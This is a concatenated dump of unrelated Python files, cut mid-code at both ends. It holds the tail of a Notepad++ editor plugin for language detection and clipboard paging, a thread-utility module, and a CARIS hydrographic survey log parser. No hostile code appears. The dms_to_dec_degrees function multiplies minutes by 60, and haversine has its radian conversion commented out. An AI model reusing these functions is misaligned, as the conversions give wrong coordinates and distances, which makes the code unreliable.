        iso_src = ""
        type, iso_src = isolate_source(src, 2, reg_rr[ext], ml[ext], cpos)
        if type == 1:
            # caret is inside a script region [internal primary language]
            src_lt.append([ext, iso_src])
            # get the external (markup) source and dissect it for inline
            # CSS and JavaScript if it's HTML
            type, ext_src = isolate_source(src, 0, reg_rr[ext], ml[ext])
            rng_lt = get_tag_range_list(ext_src)
            if rng_lt == 0:
                src_lt.append(["xml", ext_src])
            elif rng_lt == -1:
                if first_time:
                    # debug dumps: neither xml nor html
                    with open(serv_path + "\\x1.xml", "w+") as f:
                        f.write(ext_src)
                        f.flush()
                    with open(serv_path + "\\x2.xml", "w+") as f:
                        f.write(iso_src)
                        f.flush()
                pass
            else:
                # split out script/style regions, blanking them from the
                # html copy so offsets stay aligned
                ss = ""
                res_src = ext_src
                for x in rng_lt[0]:
                    ss = "%s\n%s" % (ss, ext_src[x[0]:x[1]])
                    res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}", r" ", res_src[x[0]:x[1]]), res_src[x[1]:])
                if ss != "":
                    src_lt.append(["javascript", ss])
                ss = ""
                for x in rng_lt[1]:
                    ss = "%s\n%s" % (ss, ext_src[x[0]:x[1]])
                    res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}", r" ", res_src[x[0]:x[1]]), res_src[x[1]:])
                if ss != "":
                    src_lt.append(["css", ss])
                src_lt.append(["html", res_src])
        else:
            # caret is in the external (markup) region
            type, int_src = isolate_source(src, 1, reg_rr[ext], ml[ext])
            src_lt.append([ext, int_src])
            ext_src = iso_src
            rng_lt = get_tag_range_list(iso_src)
            t_ext = "html"
            if rng_lt == 0:
                src_lt.append(["xml", ext_src])
                t_ext = "xml"
            elif rng_lt == -1:
                if first_time:
                    Console.write(console, "[EXTERNAL] Not XML!\n" + err_msg)
                pass
            else:
                ss = ""
                res_src = ext_src
                for x in rng_lt[0]:
                    ss = "%s\n%s" % (ss, ext_src[x[0]:x[1]])
                    res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}", r" ", res_src[x[0]:x[1]]), res_src[x[1]:])
                if ss != "":
                    src_lt.append(["javascript", ss])
                ss = ""
                for x in rng_lt[1]:
                    ss = "%s\n%s" % (ss, ext_src[x[0]:x[1]])
                    res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}", r" ", res_src[x[0]:x[1]]), res_src[x[1]:])
                if ss != "":
                    src_lt.append(["css", ss])
                src_lt.append(["html", res_src])
            # detect which markup sub-language the caret sits in
            res = get_tag_range_list(iso_src, 1, cpos)
            if res == -1:
                pass
            if res == "script":
                ext = "javascript"
            elif res == "style":
                ext = "css"
            else:
                ext = "html"
            if t_ext == "xml":
                ext = "xml"
    elif ext == "html":
        # plain html file: detect inline script/style at the caret
        cpos = ed.getCurrentPos()
        txt = editor.getText()
        res = get_tag_range_list(txt, 1, cpos)
        if res == "script":
            ext = "javascript"
        elif res == "style":
            ext = "css"
        else:
            ext = "html"
        src_lt.append([ext, txt])
    else:
        src_lt.append([ext, editor.getText()])
        pass
    if auto_lang:
        try:
            if ext != current_lang:
                current_lang = ext
                Console.write(console, "Switch to: " + str(ext) + "\n")
                with open(serv_path + "\\grammar\\context.txt", "w+") as f:
                    f.write(ext)
                    f.flush()
        except:
            pass
    return src_lt


dm = {"python": "py", "php": "php", "html": "html", "css": "css", "javascript": "js", "xml": "xml", "c": "cpp"}


def memcomplete():
    """Background loop: every 0.5s, make sure each open buffer has a
    completion-memory slot, run the per-language parsers on the current
    buffer's sources, and drop memory for closed buffers."""
    global buffid_list
    global lang_list
    global atom_list
    global atom_map
    global m_vd
    global m_fd
    global m_cd
    global m_tl
    global dm
    default_lang = "php"
    d = {"py": parse_py, "php": parse_php, "html": parse_html, "css": parse_css, "js": parse_js, "xml": parse_xml, "cpp": parse_cpp}
    ext = None
    while True:
        time.sleep(0.5)
        cbid = Notepad.getCurrentBufferID(notepad)
        src_lt = auto_lang_detect()
        fl = Notepad.getFiles(notepad)
        buff_list = []
        for f in fl:
            fn = f[0]
            buff_id = f[1]
            if buff_id not in buff_list:
                buff_list.append(buff_id)
            buff_index = f[2]
            buff_side = f[3]
            fns = fn.split(".")
            fnsl = len(fns)
            if fnsl < 2:
                ext = default_lang
            else:
                ext = fns[fnsl - 1]
            if ext not in d:
                ext = default_lang
            # first sighting of this buffer: seed its memory structure
            if buff_id not in bm:
                tm = {}
                tm[ext] = {}
                tm[ext]["alias"] = {}
                bm[buff_id] = tm
                if ext in atom_map:
                    for a in atom_map[ext]:
                        tm[ext][a] = []
                        tm[ext]["alias"][a] = {}
            if cbid == buff_id:
                for x in src_lt:
                    t_ext = x[0]
                    if t_ext in dm:
                        t_ext = dm[t_ext]
                    d[t_ext](x[1], buff_id)
        # forget buffers that are no longer open
        xl = []
        for b in bm.keys():
            if b not in buff_list:
                xl.append(b)
        for x in xl:
            bm.pop(x)


cd_re = re.compile("[\\\/]*")


def page_match(cdir, pgdir):
    """Score how well clipboard-page directory pgdir matches file
    directory cdir: 0 for no match, otherwise (depth difference + 1),
    so smaller positive scores are more specific matches."""
    global cd_re
    da = cd_re.split(cdir)
    pa = cd_re.split(pgdir)
    # Pop unneeded leading element.
    da.pop(0)
    pa.pop(0)
    dal = len(da)
    pal = len(pa)
    if dal < pal:
        return 0
    for i in range(0, pal):
        if da[i] != pa[i]:
            return 0
    return (dal - pal) + 1
def cbmanager():
    """Background loop managing clipboard 'pages': load buffers for the
    default page via the cb_client subprocess, then every 0.1s match open
    files against page directories and auto-switch the active page."""
    global ed
    global icb_max
    global cb_buff
    global internal_cb
    global cb_page_map
    global cb_page_bmap
    global cb_page_default
    global cb_page
    global serv_path
    global cb_page_auto_detect
    # read the auto-detect flag (1 = on)
    try:
        raw = ""
        with open(serv_path + "\\clipboard\\autopage.ini", "r+") as f:
            raw = f.readline()
        r = raw.replace("\r", "").replace("\t", "").replace(" ", "").replace("\n", "")
        n = int(r)
        if n != 1:
            cb_page_auto_detect = False
        else:
            cb_page_auto_detect = True
    except:
        pass
    # Get page list via a cb_client subprocess.
    sub = subprocess.Popen(["python", "-u", serv_path + "\\clipboard\\cb_client.py", ":pagelist"], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    try:
        raw = sub.communicate()[0]
        rl = raw.split("\n")
        for r in rl:
            rs = r.split(",")
            rl = len(rs)
            if rl < 3:
                try:
                    sub.terminate()
                except:
                    pass
                break
            try:
                tmp = [rs[0], int(rs[2]), rs[3], int(rs[4])]
                cb_page_bmap[rs[1]] = tmp
            except:
                pass
    except:
        pass
    cb_page_map[cb_page_default] = [""] * icb_max
    cb_page = cb_page_default
    cb_buff = cb_page_bmap[cb_page_default][3] - 1
    # Load up the buffers from the database for the default page file.
    for i in range(0, icb_max):
        sub = subprocess.Popen(["python", "-u", serv_path + "\\clipboard\\cb_client.py", ":page", str(cb_page_default), ":buffer", str(i + 1)], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        try:
            raw = sub.communicate()[0]
            cb_page_map[cb_page_default][i] = raw
        except:
            pass
        pass
    internal_cb = cb_page_map[cb_page_default]
    while True:
        time.sleep(0.1)
        fl = Notepad.getFiles(notepad)
        tpl = []
        for f in fl:
            fn = f[0]
            cfn = False
            if fn == Notepad.getCurrentFilename(notepad):
                cfn = True
            dir = get_dirname(fn)
            m = None
            for k, v in cb_page_bmap.iteritems():
                cbd = v[2]
                n = page_match(dir, cbd)
                # matches and is a stronger (smaller-score) match than
                # any previous matching page entry
                if (n != 0) and ((m == None) or (m[1] > n)):
                    m = [k, n]
            # Match found...
            if m != None:
                if m[0] not in cb_page_map:
                    tpl.append(m[0])
                    t = cb_page_bmap[m[0]]
                    cb_page_map[m[0]] = [""] * t[1]
                    # load this page's buffers from the database
                    for i in range(0, t[1]):
                        sub = subprocess.Popen(["python", "-u", serv_path + "\\clipboard\\cb_client.py", ":page", str(m[0]), ":buffer", str(i + 1)], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                        try:
                            raw = sub.communicate()[0]
                            cb_page_map[m[0]][i] = raw
                        except:
                            pass
                        pass
                if cfn and cb_page_auto_detect and (cb_page != m[0]) and (m[0] in cb_page_map):
                    internal_cb = cb_page_map[m[0]]
                    m2 = cb_page_bmap[m[0]]
                    cb_page = m[0]
                    cb_buff = m2[3] - 1
            elif cfn and cb_page_auto_detect and (cb_page != cb_page_default):
                # no page matched: fall back to the default page
                internal_cb = cb_page_map[cb_page_default]
                cb_page = cb_page_default
                cb_buff = cb_page_bmap[cb_page_default][3] - 1


if __name__ == '__main__':
    Thread(target=cmd_server).start()
    Thread(target=paste_server).start()
    Thread(target=memcomplete).start()
    Thread(target=cbmanager).start()
    Thread(target=dragon_thread).start()
fctthread.py
"""Control methods in separate threads.""" import logging import os import queue import subprocess as _subp import sys import threading __version__ = '0.2.10' logger = logging.getLogger(__name__) #------------------------------------------------------- def _popen_ext(cmd, shell=False): _subp.Popen(cmd, shell=shell, start_new_session=True, stdin=_subp.DEVNULL, stdout=_subp.DEVNULL, stderr=_subp.DEVNULL) if sys.platform.startswith('win'): def _start_file(cmd): os.startfile(cmd) elif sys.platform.startswith('linux'): def _start_file(cmd): _popen_ext(['xdg-open', cmd]) else: raise ImportError(f'platform {sys.platform} not supported') def shell_cmd(cmd): """Process a shell command within python.""" return _subp.run(cmd, shell=True, stdin=_subp.DEVNULL, stdout=_subp.PIPE, stderr=_subp.STDOUT).stdout.decode(errors='replace') def start_app(cmd): """Start application or open file.""" try: if not isinstance(cmd, str): _popen_ext(cmd) elif os.path.isfile(cmd): _start_file(cmd) else: _popen_ext(cmd, shell=True) return True except Exception: logger.exception('not possible to start app, command: %s', cmd) return False def start_daemon(target, args=(), kwargs=None): """Start and return daemon thread.""" t = threading.Thread(target=target, args=args, kwargs=kwargs, daemon=True) t.start() return t def start_internal_thread(target, args=(), kwargs=None): logger.warning('start_internal_thread deprecated, use start_daemon') return start_daemon(target, args, kwargs) #------------------------------------------------------- class ThreadLoop: """Class to control function in a daemon thread. Loops over target() until calling stop or the target returns True. 
""" def __init__(self, target): self._t = None self._target = target self._lock = threading.Lock() self._start_flag = False self._should_run = False self._stop_flag = False def _handle(self): while True: try: while self._should_run and not self._start_flag: if self._target(): break except Exception: logger.exception('ThreadLoop callback error') with self._lock: if self._start_flag: self._start_flag = False self._should_run = True else: self._should_run = False self._stop_flag = True return def start(self): with self._lock: self._start_flag = True if self._stop_flag: self._t.join() if not self.is_alive(): self._stop_flag = False self._t = threading.Thread(target=self._handle, daemon=True) self._t.start() def stop(self, timeout=None): if not self._t: return True with self._lock: self._start_flag = False self._should_run = False self._t.join(timeout) return not self._t.is_alive() def join(self, timeout=None): if self._t: self._t.join(timeout) def is_alive(self): return self._t.is_alive() if self._t else False class QueueWorker: """Class to process elements from a queue in separate threads. If a thread is not called within timeout seconds it will be stopped. 
""" def __init__(self, target, maxthreads=2, *, timeout=10): if maxthreads <= 0: raise ValueError('number of threads must be at least 1') if timeout < 0: raise ValueError('timeout must be a nonnegative number') self._target = target self._maxthreads = maxthreads self._timeout = timeout self._enabled = False self._active_loops = 0 self._q = queue.Queue(maxthreads) self._lock = threading.Lock() self._all_done = threading.Condition(self._lock) def _handle(self): while True: try: while self._enabled: x = self._q.get(timeout=self._timeout) try: self._target(x) except Exception: logger.exception('QueueWorker callback error') finally: self._q.task_done() except queue.Empty: pass finally: with self._lock: if not self._enabled or self._active_loops > self._q.unfinished_tasks: self._active_loops -= 1 self._all_done.notify_all() return def _start_thread(self): # self._lock must be locked if self._active_loops < self._maxthreads: threading.Thread(target=self._handle, daemon=True).start() self._active_loops += 1 def _check(self): # make sure self._lock is locked # will be removed in the future if self._active_loops < 0 or self._active_loops > self._maxthreads or \ self._active_loops + self._q.qsize() < self._q.unfinished_tasks: logger.critical('QueueWorker bad number of loops: %s', self.info()) def put(self, x, timeout=None): self._q.put(x, timeout=timeout) with self._lock: self._check() if self._active_loops < self._q.unfinished_tasks: self._start_thread() def start(self): with self._lock: self._check() if self._enabled: return self._enabled = True for _ in range(self._q.qsize()): self._start_thread() def stop(self, timeout=None): with self._lock: self._enabled = False self.join(timeout) return not self._active_loops def join(self, timeout=None): with self._all_done: self._all_done.wait_for(lambda: self._active_loops<=0, timeout) def is_alive(self): return self._enabled or self._active_loops > 0 def info(self): return {'enabled': self._enabled, 'loops': self._active_loops, 
'unfinished': self._q.unfinished_tasks, 'waiting': self._q.qsize()} class CmpEvent: """Class to receive data from another thread after a successful comparison. This data is accessible with CmpEvent.result. An optional answer can be sent to the compare thread. """ def __init__(self): self._cond = threading.Condition(threading.Lock()) self.result = None self._cmpval = None self._answer = None self._waiting = False def init(self, cmpval, answer=True): with self._cond: self.result = None self._cmpval = cmpval self._answer = answer self._waiting = True def wait(self, timeout=None): """Return False while waiting for a match, True otherwise.""" with self._cond: return self._cond.wait(timeout) if self._waiting else True def compare(self, cmpval, result): if self._waiting: with self._cond: if cmpval == self._cmpval: self.result = result self._waiting = False self._cond.notify_all() return self._answer return None
carisapi.py
import os import sys import time import re import subprocess import datetime import tempfile from queue import Queue, Empty import threading import xml.etree.ElementTree as ET import json from math import cos, sin, asin, sqrt, degrees from collections import defaultdict import glob from winreg import ConnectRegistry, HKEY_LOCAL_MACHINE, OpenKey, QueryValueEx import geopy.distance import numpy as np from pyproj import Proj, transform import hyo2.grids.csar2 # hydrofficecsar.raw.csar from hyo2.grids.grids_manager import GridsManager from HSTB.time.UTC import UTCs80ToDateTime import HSTB.resources # This should be moved out of the HSTB.drivers.carisapi or the test data moved local to drivers from HSTB.Charlene import benchmark from HSTB.Charlene import processing_report from HSTB.Charlene import pyText2Pdf import HSTB.Charlene charlene_test_folder = os.path.join(os.path.realpath(os.path.dirname(HSTB.Charlene.__file__)), 'tests') _TCARI_CONVERTED = False _HDCSIO_CONVERTED = False if _TCARI_CONVERTED: from HSTB.tides import tidestation from HSTB.tides.tcari import TCARI if _HDCSIO_CONVERTED: pass from HSTB.drivers import HDCSio def hdcsio_read(): nav = HDCSio.HDCSNav('Navigation') return nav else: def hdcsio_read(): raise NotImplementedError("HDCSio is not implemented in Python 3 yet") ON_POSIX = 'posix' in sys.builtin_module_names # lic_success, val = HDCSio.InitLicenseHDCS() # if not lic_success: # print "Pydro License did not initialize for MAC:" # print HDCSio.GetLicenseCredentials() # else: # print 'Pydro License: {}'.format(HDCSio.GetLicenseCredentials()) def haversine(lon1, lat1, lon2, lat2): """ Calculate the great circle distance between two points on the earth (specified in decimal degrees) """ # convert decimal degrees to radians # lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) # haversine formula dlon = lon2 - lon1 dlat = lat2 - lat1 a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2 c = 2 * asin(sqrt(a)) r = 3440 # Radius of 
earth in nautical miles. Use 6371 for kilometers. 3959 for miles. return c * r def dms_to_dec_degrees(d, m, s): decdegrees = d + (m * 60) + (s / 3600) return decdegrees def vincenty(lon1, lat1, lon2, lat2): # convert radians to decimal degrees lon1, lat1, lon2, lat2 = degrees(lon1), degrees(lat1), degrees(lon2), degrees(lat2) # vincenty accounts for oblate spheroid return geopy.distance.vincenty((lat1, lon1), (lat2, lon2)).nm # def pydro_lic_check(): # return lic_success def read_stats_from_hdcs(projfolder, vers): if vers >= 11: stats = read_stats_from_hdcs_v11(projfolder) return stats else: stats = read_stats_from_hdcs_v10(projfolder) return stats def read_stats_from_hdcs_v11(projfolder): mintime = [] maxtime = [] tottime = [] lats = [] lons = [] lnm = [] hdcsio_lnm = [] process_history = [] nav = hdcsio_read() data = [['' for x in range(3)] for y in range(len(os.listdir(projfolder)))] hdcsfolders = [] for fold in os.listdir(projfolder): if os.path.isdir(os.path.join(projfolder, fold)): hdcsfolders.append(fold) for count, hdcsfolder in enumerate(hdcsfolders): processlog = os.path.join(projfolder, hdcsfolder, 'Process.log') try: with open(processlog) as jsonfile: jsondata = json.load(jsonfile) navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for proc in jsondata['processes']: procid = str(proc['definition']['base']['identification']['id']) process_history.append(tuple((hdcsfolder, procid))) if procid[:12] == 'ImportToHIPS': data[count][0] = proc['parameters']['Metadata']['ConversionSummary'].splitlines() if 'BathySummary' in list(proc['parameters']['Metadata'].keys()): data[count][1] = proc['parameters']['Metadata']['BathySummary'].splitlines() if 
'NavigationSummary' in list(proc['parameters']['Metadata'].keys()): navtext = proc['parameters']['Metadata']['NavigationSummary'].splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) except: print('Unable to read process log from line {}'.format(processlog)) return history_dict = defaultdict(list) for line, proc in process_history: history_dict[line].append(proc) starttime = time.strftime('%j %H:%M:%S', min(mintime)) endtime = time.strftime('%j %H:%M:%S', max(maxtime)) tot = np.array(tottime) totaltime = tot.sum() tot = np.array(hdcsio_lnm) totalmiles = tot.sum() lats, lons = np.array(lats), np.array(lons) extent_stats = [lats.min(), lats.max(), lons.min(), lons.max()] return {'history_dict': history_dict, 'process_history': process_history, 'starttime': starttime, 'endtime': endtime, 'totaltime': totaltime, 'totalmiles': totalmiles, 'data': data, 'hdcsio_lnm': hdcsio_lnm, 'extent_stats': extent_stats} def read_stats_from_hdcs_v10(projfolder): mintime = [] maxtime = [] tottime = [] lats = [] lons = [] lnm = [] hdcsio_lnm = [] process_history = [] nav = hdcsio_read() data = [['' for x in range(3)] for y in range(len(os.listdir(projfolder)))] for count, hdcsfolder in enumerate(os.listdir(projfolder)): processlog = os.path.join(projfolder, hdcsfolder, 'Process.log') try: tree = ET.parse(processlog) root = tree.getroot() found = False navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if 
os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for process in root.iterfind('process'): id = process.find('id') process_history.append(tuple((hdcsfolder, id.text))) if id.text[:12] == 'ImportToHIPS': for port in process.findall('port'): if port.find('id').text == 'Metadata': for attribute in port.find('source').find('data').find('complex').findall('attribute'): if attribute.find('id').text == 'ConversionSummary': converttext = attribute.find('simple').find('value').text.splitlines() data[count][0] = converttext if attribute.find('id').text == 'BathySummary': try: bathytext = attribute.find('simple').find('value').text.splitlines() data[count][1] = bathytext except: pass if attribute.find('id').text == 'NavigationSummary': navtext = attribute.find('simple').find('value').text.splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) found = True break if found: break except: # We had one odd example of a json process log in 10.4.2, try to read it here just in case try: with open(processlog) as jsonfile: jsondata = json.load(jsonfile) navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 
'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for proc in jsondata['processes']: procid = str(proc['definition']['base']['identification']['id']) process_history.append(tuple((hdcsfolder, procid))) if procid[:12] == 'ImportToHIPS': data[count][0] = proc['parameters']['Metadata'][0]['ConversionSummary'][0].splitlines() if 'BathySummary' in list(proc['parameters']['Metadata'][0].keys()): data[count][1] = proc['parameters']['Metadata'][0]['BathySummary'][0].splitlines() if 'NavigationSummary' in list(proc['parameters']['Metadata'][0].keys()): navtext = proc['parameters']['Metadata'][0]['NavigationSummary'][0].splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) except: print('Unable to read process log from line {}'.format(processlog)) return history_dict = defaultdict(list) for line, proc in process_history: history_dict[line].append(proc) starttime = time.strftime('%j %H:%M:%S', min(mintime)) endtime = time.strftime('%j %H:%M:%S', max(maxtime)) tot = np.array(tottime) totaltime = tot.sum() tot = np.array(hdcsio_lnm) totalmiles = tot.sum() lats, lons = np.array(lats), np.array(lons) extent_stats = [lats.min(), lats.max(), lons.min(), lons.max()] return {'history_dict': history_dict, 'process_history': process_history, 'starttime': starttime, 'endtime': endtime, 'totaltime': totaltime, 'totalmiles': totalmiles, 'data': data, 'hdcsio_lnm': hdcsio_lnm, 
'extent_stats': extent_stats} def parse_charlene_carislog(carislog): excludedwarnings = [['Static values used instead.', 28], ['Vessel settings used instead.', 30], ['Device model from vessel settings used instead.', 48]] # two chars for /n alreadywarned = [] alreadyerror = [] warningdict = {'Delayed heave was selected but no data was found': ['If you load delayed heave using pos options "Create ___ SBET" or ".000 Delayed Heave" Charlene', 'will attempt to check delayed heave at SVC and Merge. This warning probably came up because you have', 'MBES data that does not have POS files or is not covered by POS data, or POS import failed.'], 'The post-processed time extents do not entirely cover the line': ['Shows up during .000 import, you have MBES data that is not covered by POS data.', 'Double check that you have all your POS files selected in Charlene. Make sure you', 'start POS MV logging before you start the sonar and log POS MV for 5 minutes after MBES end.'], 'The post-processed data has gaps greater than the max allowed': ['Charlene by default will gaps up to 2 seconds on import. This message means you have a', 'gap greater than 2 seconds in your imported data. You can manually process to widen the', 'gap or reacquire/post process the POS data.'], 'The times of the records were outside the time range for the data': ['Caris will look at the times in the POS data and match them to times in the MBES data.', 'This message means that you have times that are in POS but not in MBES data. Generally not a concern.'], 'Post-processed data is not available for the line': ['When Caris imports from SBET (or .000), it matches times to the MBES data. This means that you have', 'MBES data that does not appear to have a matching SBET/.000. Not an issue if you load from multiple', "SBETs, as Charlene will just try each SBET with it's own Load SBET process and let Caris apply", "the SBET where it fits and pass where it does not. 
Just make sure that all lines have 'SBET_Loaded = Yes'", "Otherwise it is probably likely that you have the wrong SBETs (from an incorret day) or no SBETs at all."], 'Some transducer depths are above water': ['Generally not an issue. For Sound Velocity / beam steering, Caris uses the following to position the transducer:', ' - SVP (Z value), Heave/Pitch/Roll, HVF Waterline, Dynamic Draft', 'This warning means it ended up with the tranducer above the waterline at some point using these values', 'You will probably see fliers that have a negative z value in Subset Editor, these can just be cleaned out.'], 'No Svp was found for the specified time stamp': ['Using the method that you picked in Charlene (ex: Nearest in Distance in 4 Hours),', 'Caris was unable to find a cast that fits your MBES data. Probably either did not include', 'All of your SVP files or you have a line that is outside of 4 hours (if you picked that method)'], 'Input datum model does not completely cover survey data': ['You have a VDatum (or other separation model) that does not fully cover', 'all of your lines. You can see this by bringing in the VDatum csar in Caris to see', 'the overlap. You will probably need an additional area included in your', 'separation model. Please contact HSTB.'], 'Cannot georeference bathymetry for track lines': ['Georeference Bathymetry failed. Usually this is because it could not find', 'GPS Height. If you are loading SBETs, those probably failed, otherwise your', 'MBES files do not have GPS Height. Check the caris log for more details.'], 'TPU does not exist': ['This warning shows when you try to create a CUBE surface', '(Which requires uncertainty to generate) without having first', 'run Georeference Bathymetry. 
Or you attempted to run Georeference', 'Bathymetry and it failed.']} errordict = {'There is no GPS Height data available for this line.': ['This could be several things:,' ' - If you selected Create SBET, it most likely did not work and you have no SBET height loaded', ' - If you loaded SBET or .000 Height, it did not apply because of time stamp matching or something else', ' - If you relied on .all GGK height, it was not present', 'Look at your height source and make sure it exists and is coming from the right files'], 'No lines were successfully merged': ['This error shows when your Georeference Bathymetry process (which', 'includes merge) fails. Should have accompanying warnings that will', 'tell you why this process failed.'], 'No TPU found for any survey lines to process': ['Shows when you attempt to generate a CUBE surface without having successfully', 'run Georeferenced Bathymetry (which contains merge/tpu processing)', 'CUBE requires TPU to run, check the log to see why Georeference Bathy failed.'], 'Insufficient data provided for swath estimation': ['Usually seen when you pick the wrong projection. It searches for data', 'and is unable to find it because you chose the wrong UTM zone.'], 'There is no overlapping data for the surface': ['This is almost always because the line projection is either', 'completely wrong or the surface projection and the line', 'projection do not match. 
Check to see if your utm zone makes sense']} process_overview = {'Conversion': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_POSMV': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_SBET': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_RMS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportTideToHIPS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'TCARI': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': [], 'count': 0}, 'GeoreferenceHIPSBathymetry': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'SoundVelocityCorrectHIPSWithCARIS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeHIPSGPSTide': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'MergeHIPS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeHIPSTPU': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateHIPSGrid': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateSIPSBeamPattern': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeSIPSTowfishNavigation': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateSIPSMosaic': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}} activeproc = '' sbetproc = False with open(carislog, 'r') as carislogfile: carislines = carislogfile.readlines() for l in carislines: 
if l[0:20] == '*******Running TCARI': process_overview['TCARI']['start'] = l.rstrip() activeproc = 'TCARI' elif l[0:12] == '*******TCARI': process_overview['TCARI']['end'] = l.rstrip() activeproc = 'TCARI' elif activeproc == 'TCARI' and l[0:23] == '^^^ End tide processing': process_overview['TCARI']['count'] += 1 elif l[0:6] == '======': rawmsg = l.split(':')[0][7:] savemsg = l[7:len(l) - 8] if rawmsg in ['Hypack RAW, HSX start', 'Kongsberg ALL start', 'Teledyne S7K start', 'Klein SDF start', 'Edgetech JSF start']: process_overview['Conversion']['start'] = savemsg activeproc = 'Conversion' elif rawmsg in ['Hypack RAW, HSX end', 'Kongsberg ALL end', 'Teledyne S7K end', 'Klein SDF end', 'Edgetech JSF end']: process_overview['Conversion']['end'] = savemsg activeproc = 'Conversion' elif rawmsg == 'Import HIPS From Applanix POS MV start': process_overview['ImportHIPSFromAuxiliaryAPP_POSMV']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_POSMV' elif rawmsg == 'Import HIPS From Applanix POS MV end': process_overview['ImportHIPSFromAuxiliaryAPP_POSMV']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_POSMV' elif rawmsg == 'Import HIPS From Applanix SBET start': process_overview['ImportHIPSFromAuxiliaryAPP_SBET']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_SBET' elif rawmsg == 'Import HIPS From Applanix SBET end': process_overview['ImportHIPSFromAuxiliaryAPP_SBET']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_SBET' elif rawmsg == 'Import HIPS From Applanix RMS start': process_overview['ImportHIPSFromAuxiliaryAPP_RMS']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_RMS' elif rawmsg == 'Import HIPS From Applanix RMS 